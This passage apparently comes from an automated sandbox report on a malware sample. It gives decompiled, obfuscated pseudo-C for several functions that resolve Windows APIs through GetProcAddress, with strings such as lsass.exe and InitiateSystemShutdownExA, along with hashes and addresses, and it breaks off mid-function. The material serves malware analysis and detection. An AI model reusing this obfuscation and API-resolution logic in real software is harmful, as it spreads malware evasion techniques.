                      • Opcode ID: b6c3d83a754756f610e3dee72b481b8f5311bc70a7a42ddb289e0c7c1a0aca38
                      • Instruction ID: bc710896631b538037edb259ebb6e5889ae4351c7705093c30400e6f0467f617
                      • Opcode Fuzzy Hash: b6c3d83a754756f610e3dee72b481b8f5311bc70a7a42ddb289e0c7c1a0aca38
                      • Instruction Fuzzy Hash: 3EF1C075F142469FDB00DFB9EC942CE7BB1FB3A310B08846AD95597366E3390948EB05
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004790F7 Relevance: 24.9, APIs: 1, Strings: 13, Instructions: 403libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 55%
                      			E004790F7(void* __ecx, signed int __edi, void* __esi, void* __eflags) {
				signed int _t112;
				unsigned short _t115;
				signed char _t116;
				signed int _t128;
				signed int _t136;
				signed int _t139;
				signed int _t141;
				signed int _t144;
				signed int _t160;
				signed int _t173;
				signed int _t177;
				signed int _t183;
				unsigned short _t193;
				signed int _t200;
				signed int _t211;
				signed int _t225;
				signed int _t234;
				signed int _t245;
				signed char _t271;
				signed char _t272;
				short _t277;
				short _t284;
				signed char _t286;
				intOrPtr _t287;
				short _t288;
				signed short _t299;
				signed char _t304;
				unsigned short _t310;
				signed int _t312;
				void* _t313;
				void* _t316;
				void* _t320;
				void* _t321;

				_t313 = __esi;
				_t309 = __edi;
				_t271 = __ecx + 0x566e75;
				 *((intOrPtr*)(_t321 - 0x28)) =  *((intOrPtr*)(_t321 - 0x28)) - _t271;
				 *((intOrPtr*)(_t321 - 0x2c)) =  *((intOrPtr*)(_t321 - 0x2c)) - _t271;
				_t299 = 0x8fae >> _t271;
				_t112 = E005002EA(0, _t271, _t299, __edi, __eflags);
				 *0x50b5ce =  *0x50b5ce - __esi;
				_t183 = _t112 - 0xdb;
				if(__edi < 0) {
					 *0x50bf17 = _t112;
					_t312 = __edi + __edi;
					if(_t112 <= 0xb) {
						 *0x509056 =  *0x509056 + _t112;
						 *(_t321 - 0xc) = _t112;
						_t183 =  *(_t321 - 0x14);
					}
					 *(_t321 - 0x1c) =  *(_t321 - 0x1c) - _t183;
					 *0x50bf0c =  *0x50bf0c + _t183;
					_t299 = 0xa189;
					 *0x50bf12 = _t112;
					_t313 = _t313 - 0xad294e;
					if(_t313 != 0) {
						 *0x50bf15 = _t112;
					}
					_t309 = _t312 ^ 0x0000f061;
					_t183 = "InitiateSystemShutdownExA";
				}
				 *(_t321 - 0x58) = _t112;
				 *(_t321 - 0x10) = _t183 - _t112 - 0x20ac01 + 0x2ed086;
				 *(_t321 - 8) = _t112;
				_push(_t112);
				L00468BBD(_t112, _t299);
				_t115 =  *(_t321 - 8);
				_push( *(_t321 - 0x58));
				_t272 =  *0x509168; // 0x118d
				if(_t272 == _t272) {
					L9:
					_t299 = 0xad99;
					 *0x50924e =  *0x50924e - _t313;
					 *0x50b56a =  *0x50b56a - _t313;
					if((_t309 & _t313 + _t313) == 0) {
						 *0x50962a =  *0x50962a + _t309;
					}
					_t309 = _t309 & 0x0000ecac;
					goto L12;
				} else {
					if((_t299 & 0x00000088) <= 0) {
						L12:
						_t193 = _t115;
						_t116 = GetProcAddress( *0x5093f8, ??);
						_t315 = 0x50bf12;
						if((_t116 & 0x000000bb) < 0) {
							L19:
							 *0x50bf15 = _t116;
							_t310 = _t309 + _t309;
							 *0x50aa70 = _t116;
							 *0x50bf0c =  *0x50bf0c + _t272;
							_push(0);
							if(((_t193 >> _t272) - 0x00364f7f | 0x00004c53) >= ((_t193 >> _t272) - 0x00364f7f | 0x00004c53)) {
								_t272 = 0x5d23;
								 *0x50917a = 0x5d23;
								_t299 = _t299 - 0x8c71;
							}
							 *0x509214 = _t299;
							_t316 = _t315 - 1;
							_push( *0x50902c);
							if((_t299 & 0x00009d42) < 0) {
								_t299 = 0xad07;
								 *0x50ad84 =  *0x50ad84 + _t316;
								_t310 = _t310 >> _t272;
							}
							 *(_t321 - 8) = _t116;
							_t200 = "CoLockObjectExternal";
							 *(_t321 - 0x1c) = _t200;
							 *(_t321 - 0x14) = _t200;
							_push( *0x509050);
							E0046624A(0, 0x7116, _t299, _t310, _t316, 0);
							 *(_t321 - 0x18) = "ucmhc.dll";
							_push( *0x509006);
							_t277 = 0x512580;
							_t128 =  *(_t321 - 8);
							 *(_t321 - 0x10) = _t128;
							if(0xe22c < 0xe22c || 0x512580 > 0x512580) {
								_t277 = 0x7d26;
							}
							 *0x5091ca = _t299;
							_push( *0x5090d8);
							 *(_t321 - 8) = _t128;
							_t136 =  *(_t321 - 8);
							_t211 = "ucmhc.dll";
							 *(_t321 - 0x18) = _t211;
							if(_t211 != _t211) {
								 *0x509156 = _t277;
								_t277 =  *0x5091a2; // 0x8971
								 *0x5091f2 = 0x9118;
								_t211 =  *0x50bf12; // -34
							}
							 *0x50bf14 = _t136;
							 *(_t321 - 8) = _t136;
							 *(_t321 - 0x10) = 0xec;
							_t139 =  *(_t321 - 8);
							_push( *0x5090d8);
							 *0x509178 = _t277 - 0x528217 + 0x6bc3;
							_t282 = 0;
							 *0x50bf14 = _t139;
							_push( *0x50902c);
							_t304 =  *0x509212; // 0xc472
							 *0x50bf13 = _t139;
							_t320 = _t316 + 0xca60 - 0xa13ace + _t316 + 0xca60 - 0xa13ace + 0xd34e;
							 *(_t321 - 8) = _t139;
							_t141 =  *(_t321 - 8);
							_t225 = "CoLockObjectExternal";
							 *0x50bf0c =  *0x50bf0c - _t225;
							if(0 == 0) {
								_t282 = 0x67;
								 *((intOrPtr*)(_t321 - 0x28)) =  *((intOrPtr*)(_t321 - 0x28));
								 *0x509196 = 0x67;
							}
							 *(_t321 - 8) = _t141;
							_t144 =  *(_t321 - 8);
							 *(_t321 - 0x14) = _t225;
							 *0x50914e = _t282;
							_push( *0x5091bc);
							_t284 = _t282 - 0x5d53d5 + 0x77d4;
							 *0x50919e = _t284;
							if((_t304 & 0x00799cde) != 0) {
								_t304 = _t304 + 0x8ed43f;
							}
							 *(_t321 - 8) = _t144;
							 *0x50bf0b =  *0x50bf0b + 0x25b1a3;
							_push( *0x50902c);
							 *0x50912e = _t284;
							_push( *0x5090ec);
							_t234 = "NtSetDriverEntryOrder" ^ 0x000055a1;
							_t286 =  *0x509130; // 0x5f4e
							 *(_t321 - 0x14) = _t234;
							 *(_t321 - 0x10) = "lsass.exe";
							_t160 =  *(_t321 - 8);
							_push( *0x509006);
							 *(_t321 - 8) = _t160;
							 *(_t321 - 0xc) =  !_t160;
							 *(_t321 - 0x14) = _t234 + _t234 + 0x326361 - 0x2e207b >> _t286;
							_push( *0x50908c);
							 *0x509148 = _t286;
							if("normaliz.dll" >= 0x23bb73) {
							}
							_t287 =  *0x50914e; // 0xef9e
							_t288 = _t287 - 1;
							 *0x50919a = _t304;
							_push( *0x5090d8);
							_t173 =  *(_t321 - 8);
							_t245 =  *(_t321 - 0x18);
							 *(_t321 - 8) = _t173;
							if(_t173 <= 0x1b) {
								L39:
								if(_t173 >= 0) {
									 *0x509668 =  *0x509668;
								}
								goto L42;
							} else {
								 *(_t321 - 0x18) = 0x2d9d53;
								 *(_t321 - 0x1c) = 0x2d9d53;
								_t245 = 0;
								_t288 = _t288 - 0x580ae0;
								 *0x50915a =  *0x50915a - _t288;
								 *0x509170 = _t288;
								if((_t304 & 0x0000008c) != 0) {
									L38:
									_t173 = 0xcc;
									if(_t320 != 0) {
										L42:
										 *0x50908e =  *0x50908e + _t245;
										L43:
										_t177 =  *(_t321 - 8);
										_push( *0x5090a4);
										 *(_t321 - 8) = _t177;
										_push(0);
										_push(0x4796ec);
										_push(E0046624A);
										return _t177 + _t177;
									}
									goto L39;
								}
								if((_t304 & 0x0000009c) > 0) {
									goto L43;
								}
								 *0x50aabc =  *0x50aabc + _t304;
								goto L38;
							}
						}
						_t315 = 0xa17e24;
						 *0x50bf17 = _t116;
						_t309 = 0;
						 *(_t321 - 0xc) = _t116;
						if("networkitemfactory.dll" != "networkitemfactory.dll") {
							L17:
							L18:
							_t193 = 0xcc;
							goto L19;
						}
						_t272 = 0x798a;
						if(0x108 != 0) {
							goto L18;
						}
						_t299 = 0;
						if(0 >= 0) {
							 *0x50bf12 = _t116;
						}
						goto L17;
					}
					 *0x50a800 =  *0x50a800 + _t299;
					goto L9;
				}
			}




































                      0x004790f7
                      0x004790f7
                      0x00479101
                      0x00479107
                      0x0047910a
                      0x00479115
                      0x00479118
                      0x0047911d
                      0x00479125
                      0x0047912b
                      0x0047912d
                      0x00479132
                      0x00479137
                      0x00479139
                      0x00479140
                      0x00479145
                      0x00479145
                      0x00479148
                      0x0047914b
                      0x00479164
                      0x00479168
                      0x0047916e
                      0x00479177
                      0x00479179
                      0x00479179
                      0x0047917e
                      0x00479186
                      0x00479186
                      0x00479199
                      0x0047919c
                      0x0047919f
                      0x004791a2
                      0x004791a3
                      0x004791ac
                      0x004791b4
                      0x004791b7
                      0x004791c1
                      0x004791ce
                      0x004791d5
                      0x004791d9
                      0x004791e0
                      0x004791eb
                      0x004791ed
                      0x004791ed
                      0x004791f4
                      0x00000000
                      0x004791c3
                      0x004791c6
                      0x00479201
                      0x0047920e
                      0x00479210
                      0x00479216
                      0x0047921f
                      0x00479279
                      0x00479279
                      0x0047927e
                      0x00479281
                      0x00479295
                      0x0047929e
                      0x004792a2
                      0x004792a7
                      0x004792ab
                      0x004792b5
                      0x004792b5
                      0x004792ba
                      0x004792c3
                      0x004792c4
                      0x004792d3
                      0x004792d5
                      0x004792d9
                      0x004792eb
                      0x004792eb
                      0x004792f0
                      0x00479300
                      0x00479305
                      0x0047931c
                      0x00479326
                      0x00479346
                      0x00479353
                      0x00479369
                      0x00479370
                      0x00479377
                      0x0047937a
                      0x00479383
                      0x00479393
                      0x00479393
                      0x00479397
                      0x004793a0
                      0x004793a7
                      0x004793d0
                      0x004793d3
                      0x004793d8
                      0x004793dd
                      0x004793e4
                      0x004793ee
                      0x004793f9
                      0x00479403
                      0x00479403
                      0x0047940c
                      0x0047941e
                      0x0047942b
                      0x00479436
                      0x00479439
                      0x0047944d
                      0x00479454
                      0x0047946e
                      0x00479473
                      0x0047947a
                      0x00479487
                      0x0047948f
                      0x00479499
                      0x004794a3
                      0x004794ab
                      0x004794b0
                      0x004794b9
                      0x004794bb
                      0x004794be
                      0x004794c1
                      0x004794c1
                      0x004794cb
                      0x004794d4
                      0x004794d7
                      0x004794e3
                      0x004794ea
                      0x004794fd
                      0x00479502
                      0x0047950f
                      0x00479514
                      0x00479514
                      0x0047951a
                      0x00479527
                      0x0047952d
                      0x0047955c
                      0x00479569
                      0x00479570
                      0x00479576
                      0x0047958a
                      0x00479597
                      0x004795ac
                      0x004795af
                      0x004795b6
                      0x004795bb
                      0x004795da
                      0x004795ea
                      0x004795f6
                      0x0047960a
                      0x0047960a
                      0x0047961c
                      0x00479623
                      0x00479624
                      0x0047962e
                      0x00479645
                      0x0047964d
                      0x00479650
                      0x00479655
                      0x00479698
                      0x0047969d
                      0x0047969f
                      0x0047969f
                      0x00000000
                      0x00479657
                      0x0047965f
                      0x00479662
                      0x00479665
                      0x00479668
                      0x0047966e
                      0x00479675
                      0x00479682
                      0x00479691
                      0x00479691
                      0x00479696
                      0x004796b3
                      0x004796b3
                      0x004796bc
                      0x004796c2
                      0x004796c5
                      0x004796d9
                      0x004796df
                      0x004796e1
                      0x004796e6
                      0x004796eb
                      0x004796eb
                      0x00000000
                      0x00479696
                      0x00479687
                      0x00000000
                      0x00000000
                      0x00479689
                      0x00000000
                      0x00479689
                      0x00479655
                      0x00479221
                      0x00479227
                      0x0047922c
                      0x00479237
                      0x00479249
                      0x00479271
                      0x00479277
                      0x00479277
                      0x00000000
                      0x00479277
                      0x00479255
                      0x0047925e
                      0x00000000
                      0x00000000
                      0x00479260
                      0x00479269
                      0x0047926b
                      0x0047926b
                      0x00000000
                      0x00479269
                      0x004791c8
                      0x00000000
                      0x004791c8

                      APIs
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00479210
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: U$$CoLockObjectExternal$InitiateSystemShutdownExA$NtSetDriverEntryOrder$RegDeleteKeyExW$RtlReleaseRelativeName$WSManHTTPConfig.exe$api-ms-win-core-localization-l1-1-0.dll$api-ms-win-core-string-l1-1-0.dll$lsass.exe$networkitemfactory.dll$normaliz.dll$ucmhc.dll
                      • API String ID: 190572456-1852036211
                      • Opcode ID: 245b04911c3052a5cf603238619799d581d2301d6668d604d58d09fa1feda66c
                      • Instruction ID: b8c3f4eecacca3919156f4fa47470da3d10556971ec80b4dd46e9507c838d160
                      • Opcode Fuzzy Hash: 245b04911c3052a5cf603238619799d581d2301d6668d604d58d09fa1feda66c
                      • Instruction Fuzzy Hash: 42F19EB9E403069FDB00EFB8E8946CEBBB0FB39320F04856AD944A7356E3350949DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0048DD66 Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 260libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0048DE52
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G`}$IMCCPHR.exe$NtSetDriverEntryOrder$System.Net.Primitives.dll$VarI4FromCy$WFServicesReg.exe$WSManHTTPConfig.exe$_isdel.exe$aaclient.dll$lsass.exe$rG'$ucmhc.dll
                      • API String ID: 190572456-3620216841
                      • Opcode ID: 78282b8efde38e25a87dca7309345f4ea98c4ad8c8a757a3c00c1ec1ad5b0fca
                      • Instruction ID: 9ff4fb8c8486b416f283ad20d4e1b1b4b1d69f81cbb3a3c4bf9d1974cc0d837b
                      • Opcode Fuzzy Hash: 78282b8efde38e25a87dca7309345f4ea98c4ad8c8a757a3c00c1ec1ad5b0fca
                      • Instruction Fuzzy Hash: C1A18F79E1030A9BCB00EFB9E8D85DEBBB0FB29324F00446AD945E7356E3745A49DB44
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0047A8AD Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 346libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 25%
                      			E0047A8AD() {
				signed int _t64;
				signed int _t66;
				signed int _t67;
				signed int _t78;
				_Unknown_base(*)()* _t81;
				signed int _t83;
				signed int _t88;
				char* _t116;
				signed int _t119;
				void* _t121;
				signed int _t145;
				signed char _t171;
				signed int _t176;
				intOrPtr _t179;
				void* _t180;
				intOrPtr _t181;
				short _t182;
				short _t186;
				intOrPtr _t189;
				short _t191;
				signed int _t193;
				signed int _t194;
				signed short _t198;
				void* _t199;
				unsigned short _t206;
				unsigned short _t207;
				signed int* _t208;
				signed int _t209;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t221;

				 *(_t221 - 8) = _t64;
				_t66 =  *(_t221 - 8);
				if(0x3a74b5 != 0x3a74b5) {
					L4:
					_t193 = 0x97e8;
					 *0x50bf12 = _t66;
					 *(_t221 - 0x58) = _t66;
					_t207 = _t206 >> _t171;
					 *(_t221 - 0xc) = _t66;
					_t67 =  !_t66;
					if(0x3a74b5 - _t66 + 0x14 >= 0x337f) {
						 *((intOrPtr*)(_t221 - 0x1c)) =  *((intOrPtr*)(_t221 - 0x1c)) + 0x4366b6;
						 *0x509126 = _t171;
						_t171 = _t171 - 0x7292;
						 *0x5091a4 = 0x97e8;
						if(0x88 != 0) {
							 *0x50bf12 = _t67;
							_t67 = 0xd5;
							 *0x50961c =  *0x50961c - _t207;
						}
					}
					_t208 = _t207 + 0xf89c;
					 *0x50bf09 =  *0x50bf09 - 5;
					 *(_t221 - 0x18) =  &(( *(_t221 - 0x18))[0x2f1fce]);
					_t174 = 0xc7b2;
					if(0xc7b2 >= 0xc7b2) {
						_t174 = 0x14b15;
						_t193 = _t193 - 1;
					}
					 *0x509210 = _t193;
					 *0x50bf14 = 0xbe;
					_push( *(_t221 - 0x58));
					 *(_t221 - 8) =  *(_t221 - 0xc);
					_t78 =  *(_t221 - 8);
					if(0x39f18d <= 0x39f18d) {
						L15:
						if("Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll" >= 0x39c4) {
							 *0x50bf0e =  *0x50bf0e + _t174;
							 *0x509154 = _t174;
						}
						_t176 =  *0x5091a0; // 0x654
						_push( *0x5093f8);
						_t116 = _t78;
						 *(_t221 - 8) = _t78;
						if(_t78 <= 0x12539d) {
							L22:
							goto L23;
						} else {
							if(_t116 <= 0x278a64) {
								 *(_t221 - 0x18) =  *(_t221 - 0x18) - _t116;
								 *(_t221 - 0x18) = _t116;
								_t176 = _t176 - 0x590a33;
							}
							 *0x509176 = _t176;
							_t176 = 0;
							_t193 = _t193 + 0x8ab3 - 0x95;
							if((_t193 & 0x000000a5) >= 0) {
								L23:
								 *0x50912c = _t176;
								_t179 = 0x7bfa;
								 *0x5091c6 = _t193;
								_t194 = _t193;
								_t81 = GetProcAddress(??, ??);
								 *0x509214 = _t194;
								_t119 = 0x4bd58e - _t81;
								_t215 = _t213 - 0xfffffffffffff03b;
								 *0x50bf14 = _t81;
								if(_t208 <= 0) {
									L26:
									if(_t119 <= _t119) {
										 *0x50bf0e =  *0x50bf0e + _t179;
									}
									_t179 =  *0x50917e; // 0xe31a
									_t194 = 0;
									L29:
									_t198 = _t194 + _t194 + 0xad5f;
									 *0x50aaac = _t81;
									_t209 = 0x509648;
									 *0x5093a0 =  *0x5093a0 + 0x509648;
									if(_t81 < 0xff0b7) {
										L36:
										 *(_t221 - 0xc) = _t81 +  *(_t221 - 0xc);
										 *(_t221 - 0x10) = _t119;
										_t121 = 0x3b9825;
										L37:
										 *((intOrPtr*)(_t221 - 0x20)) = _t179;
										_t180 = _t179 + _t179;
										if(_t180 > _t180) {
										}
										_t198 =  *0x5091f2; // 0x3c92
										L40:
										 *0x50bf13 = _t81;
										_t216 = _t215 + 0xba96cb;
										_push(0);
										 *(_t221 - 8) = _t81;
										_t83 =  *(_t221 - 8);
										 *(_t221 - 0x10) = _t83;
										if(_t121 + _t81 > 0x2f095d) {
											L45:
											 *0x50bf17 = _t83;
											_t209 = _t209 + 0x58baf;
											 *(_t221 - 0xc) = _t83;
											L46:
											_t181 =  *0x50912e; // 0x9c03
											_push( *0x5090d8);
											 *0x50bf0e =  *0x50bf0e - _t181;
											if(_t181 != _t181) {
												if(_t181 > _t181) {
												}
												 *0x5091e4 = _t198;
												_t198 =  *0x509218; // 0xa1e2
											}
											 *0x50bf13 = _t83;
											_t217 = _t216 + 0xbe5648;
											 *0x50bf17 =  *0x50bf17 - _t83;
											 *0x50bf17 = _t83;
											_push( *0x5090d8);
											 *(_t221 - 8) = _t83;
											_t182 = 0x600b;
											 *0x509152 = 0x600b;
											 *0x50916a = 0x600b;
											_t199 = _t198 - 0x8a;
											_t88 =  *(_t221 - 8);
											if( *((intOrPtr*)(_t221 - 0x1c)) <= 0x29e6) {
												L56:
												 *0x50bf15 = _t88;
												_t209 = _t209 + 0xdd6eee;
												goto L57;
											} else {
												if(0x3acafb == 0x3acafb) {
													 *((intOrPtr*)(_t221 - 0x20)) = 0x3acafb;
												}
												_t182 = 0xffffffffffff8f24;
												if(0xffffffffffff8f24 < 0xffffffffffff8f24) {
													L57:
													_push( *0x50902c);
													 *((intOrPtr*)(_t221 - 0x20)) = _t182;
													 *(_t221 - 8) = _t88;
													_t145 =  !("NtPowerInformation" + 0x36) ^ 0x004bbf1d;
													_t186 =  *0x50912c; // 0x5d7b
													 *0x509192 = _t186;
													_push( *0x50901a);
													E00466493("dpnet.dll", _t145, _t186, _t209 + 0xdb89, _t217, 0, "dpnet.dll");
													_push(1);
													_push(_t145 - 0x38);
													_push(E0047ADCE);
													goto __ebx;
												} else {
													if((_t199 + _t199 & 0x00818191) >= 0) {
														_t217 = _t217 + 0x1970f;
														_t209 = _t209;
													}
													goto L56;
												}
											}
										}
										if(_t180 < _t180) {
											goto L46;
										}
										_t189 =  *0x509176; // 0x6328
										 *0x50bf10 =  *0x50bf10 - _t189;
										 *0x5091c2 =  *0x5091c2 + _t198;
										_t198 = _t198 + _t198 + _t198 + _t198;
										if((_t198 & 0x000000ad) < 0) {
											 *0x509244 =  *0x509244 - _t216;
										}
										goto L45;
									}
									 *(_t221 - 0x18) = "mscpxl32.dLL";
									_t121 = 0x4f950b;
									if(_t179 != _t179) {
										L34:
										if(_t81 >= 3) {
											goto L37;
										}
										_t119 = _t121 + 0x12d1;
										goto L36;
									}
									if((_t198 & 0x00008027) > 0) {
										L33:
										_t215 = 0;
										_t121 = _t121 + 0xeb;
										_t209 =  !(_t209 - 0xc7cb70);
										goto L34;
									}
									 *0x5091ee = _t198;
									_t121 = 0xba;
									if(_t215 != 0) {
										goto L40;
									}
									goto L33;
								}
								_t119 =  *(_t221 - 8) - 0x2756;
								if(_t119 != 0x2f38) {
									goto L29;
								}
								_t119 = 0;
								goto L26;
							} else {
								 *0x50b60a =  *0x50b60a + _t213;
								 *0x50bf14 = 0xbd;
								_t208 = _t208 - 0xd14099;
								 *0x509654 =  *0x509654 + _t208;
								 *0x50b93f =  *0x50b93f + _t208;
								if(0xbd <= 0x157a) {
									goto L23;
								}
								goto L22;
							}
						}
					} else {
						_t174 = _t174 + _t174 + 0x645f1a;
						 *0x50bf0f =  *0x50bf0f + _t174;
						if((_t193 & 0x007995e1) <= 0) {
							L13:
							 *0x50bf07 =  *0x50bf07 + _t78;
							L14:
							 *(_t221 - 8) = _t78;
							goto L15;
						}
						_t193 = 0x9f38;
						_t213 = _t213 - 0xbec1;
						 *0x5095fc =  *0x5095fc + _t208;
						_t208 = 0x50bf17;
						if(0x50bf17 > 0) {
							goto L14;
						}
						goto L13;
					}
				}
				if(_t171 == _t171) {
					_t171 = _t171 - 0x7a;
				}
				 *0x5091a0 = _t191;
				goto L4;
			}




































                      0x0047a8ad
                      0x0047a8c2
                      0x0047a8c7
                      0x0047a8db
                      0x0047a8e2
                      0x0047a8e6
                      0x0047a8ec
                      0x0047a8ef
                      0x0047a8f8
                      0x0047a8fb
                      0x0047a902
                      0x0047a90c
                      0x0047a90f
                      0x0047a919
                      0x0047a91e
                      0x0047a92b
                      0x0047a92d
                      0x0047a93b
                      0x0047a93d
                      0x0047a93d
                      0x0047a944
                      0x0047a946
                      0x0047a94d
                      0x0047a95e
                      0x0047a96c
                      0x0047a970
                      0x0047a972
                      0x0047a977
                      0x0047a977
                      0x0047a978
                      0x0047a984
                      0x0047a98d
                      0x0047a998
                      0x0047a9c6
                      0x0047a9cb
                      0x0047aa15
                      0x0047aa1f
                      0x0047aa28
                      0x0047aa2e
                      0x0047aa2e
                      0x0047aa37
                      0x0047aa3e
                      0x0047aa46
                      0x0047aa48
                      0x0047aa50
                      0x0047aab4
                      0x00000000
                      0x0047aa52
                      0x0047aa5b
                      0x0047aa5d
                      0x0047aa60
                      0x0047aa6a
                      0x0047aa6a
                      0x0047aa70
                      0x0047aa77
                      0x0047aa7e
                      0x0047aa84
                      0x0047aabb
                      0x0047aac3
                      0x0047aacf
                      0x0047aad3
                      0x0047aada
                      0x0047aadf
                      0x0047aae5
                      0x0047aaec
                      0x0047aaf3
                      0x0047aaf8
                      0x0047ab01
                      0x0047ab22
                      0x0047ab24
                      0x0047ab26
                      0x0047ab26
                      0x0047ab2f
                      0x0047ab3c
                      0x0047ab3f
                      0x0047ab41
                      0x0047ab46
                      0x0047ab4b
                      0x0047ab51
                      0x0047ab5c
                      0x0047abab
                      0x0047abab
                      0x0047abae
                      0x0047abb8
                      0x0047abbd
                      0x0047abbd
                      0x0047abc0
                      0x0047abc6
                      0x0047abc6
                      0x0047abcb
                      0x0047abd2
                      0x0047abd2
                      0x0047abda
                      0x0047abe0
                      0x0047abe2
                      0x0047abea
                      0x0047abed
                      0x0047abf6
                      0x0047ac3e
                      0x0047ac40
                      0x0047ac47
                      0x0047ac4e
                      0x0047ac62
                      0x0047ac64
                      0x0047ac6b
                      0x0047ac72
                      0x0047ac7b
                      0x0047ac7f
                      0x0047ac7f
                      0x0047ac87
                      0x0047ac91
                      0x0047ac91
                      0x0047ac98
                      0x0047ac9e
                      0x0047aca7
                      0x0047acad
                      0x0047acba
                      0x0047acc1
                      0x0047acd8
                      0x0047acdc
                      0x0047ace3
                      0x0047aced
                      0x0047acf8
                      0x0047ad00
                      0x0047ad3c
                      0x0047ad3c
                      0x0047ad41
                      0x00000000
                      0x0047ad02
                      0x0047ad0b
                      0x0047ad0d
                      0x0047ad0d
                      0x0047ad12
                      0x0047ad1a
                      0x0047ad58
                      0x0047ad5d
                      0x0047ad64
                      0x0047ad74
                      0x0047ad87
                      0x0047ad8d
                      0x0047ad94
                      0x0047ada0
                      0x0047adb7
                      0x0047adbf
                      0x0047adc1
                      0x0047adc2
                      0x0047adcc
                      0x0047ad1c
                      0x0047ad25
                      0x0047ad35
                      0x0047ad3a
                      0x0047ad3a
                      0x00000000
                      0x0047ad25
                      0x0047ad1a
                      0x0047ad00
                      0x0047ac03
                      0x00000000
                      0x00000000
                      0x0047ac0b
                      0x0047ac12
                      0x0047ac18
                      0x0047ac21
                      0x0047ac27
                      0x0047ac29
                      0x0047ac29
                      0x00000000
                      0x0047ac38
                      0x0047ab66
                      0x0047ab6b
                      0x0047ab75
                      0x0047aba2
                      0x0047aba4
                      0x00000000
                      0x00000000
                      0x0047aba6
                      0x00000000
                      0x0047aba6
                      0x0047ab7c
                      0x0047ab94
                      0x0047ab94
                      0x0047ab9d
                      0x0047aba0
                      0x00000000
                      0x0047aba0
                      0x0047ab7e
                      0x0047ab8e
                      0x0047ab92
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0047ab92
                      0x0047ab12
                      0x0047ab1c
                      0x00000000
                      0x00000000
                      0x0047ab20
                      0x00000000
                      0x0047aa86
                      0x0047aa8a
                      0x0047aa90
                      0x0047aa98
                      0x0047aa9e
                      0x0047aaa5
                      0x0047aab2
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0047aab2
                      0x0047aa84
                      0x0047a9d0
                      0x0047a9d3
                      0x0047a9d9
                      0x0047a9e5
                      0x0047aa09
                      0x0047aa09
                      0x0047aa0f
                      0x0047aa0f
                      0x00000000
                      0x0047aa12
                      0x0047a9e9
                      0x0047a9ef
                      0x0047a9f6
                      0x0047a9ff
                      0x0047aa07
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0047aa07
                      0x0047a9cb
                      0x0047a8cf
                      0x0047a8d1
                      0x0047a8d1
                      0x0047a8d4
                      0x00000000

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 0047AADF
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: #N;$G`}$Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.Resources.dll$NtPowerInformation$RegDeleteKeyExW$RtlReleaseRelativeName$]/$dpnet.dll$mscpxl32.dLL$normaliz.dll$sxproxy.dll
                      • API String ID: 190572456-2565978043
                      • Opcode ID: d92740306c486c9e6240cc79e34f6ef2ee8bb1ca9d45d91511f1ef6138e4d963
                      • Instruction ID: 898902ad519c878848d585b007c94232563633fc3f765b5a4dd9c773a8d692d5
                      • Opcode Fuzzy Hash: d92740306c486c9e6240cc79e34f6ef2ee8bb1ca9d45d91511f1ef6138e4d963
                      • Instruction Fuzzy Hash: 71C1E1B6E143438FDB009F78EC942DE7BB1EB79310B08846AC949D7366E3390949DB46
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00479F01 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 266libraryloaderCOMMON
                      Download Yara Rule
                      C-Code - Quality: 46%
                      			E00479F01(signed int __ecx, unsigned int __edx, signed int __edi, signed int __esi) {
				signed int _t53;
				signed int _t54;
				signed int _t60;
				signed int _t78;
				signed int _t82;
				signed int _t85;
				void* _t87;
				char _t99;
				signed int _t105;
				char* _t116;
				char* _t121;
				intOrPtr _t125;
				void* _t130;
				intOrPtr _t154;
				short _t155;
				intOrPtr _t163;
				signed char _t168;
				short _t175;
				signed int _t179;
				signed int _t187;
				signed int _t188;
				signed int _t191;
				short _t193;
				void* _t194;

				_t187 = __edi;
				_t168 = __edx >> __ecx;
				_push( *0x509006);
				_t191 = __esi & 0x000000d4;
				_t53 =  *(_t194 - 8);
				_t105 = _t194 - 0x18;
				 *(_t194 - 8) = _t53;
				_t54 =  !_t53;
				if(_t54 >= 0x1d60) {
					if(_t54 < 0x287dc2) {
						_t105 = __ecx;
						 *0x509178 = __ecx - 0x6456;
					}
					if((_t168 & 0x0000008e) != 0) {
						 *0x509212 = _t168;
					}
					_t99 =  *0x50bf13; // -9
					 *0x50bf14 = _t99;
				}
				if(0xfe >= 6) {
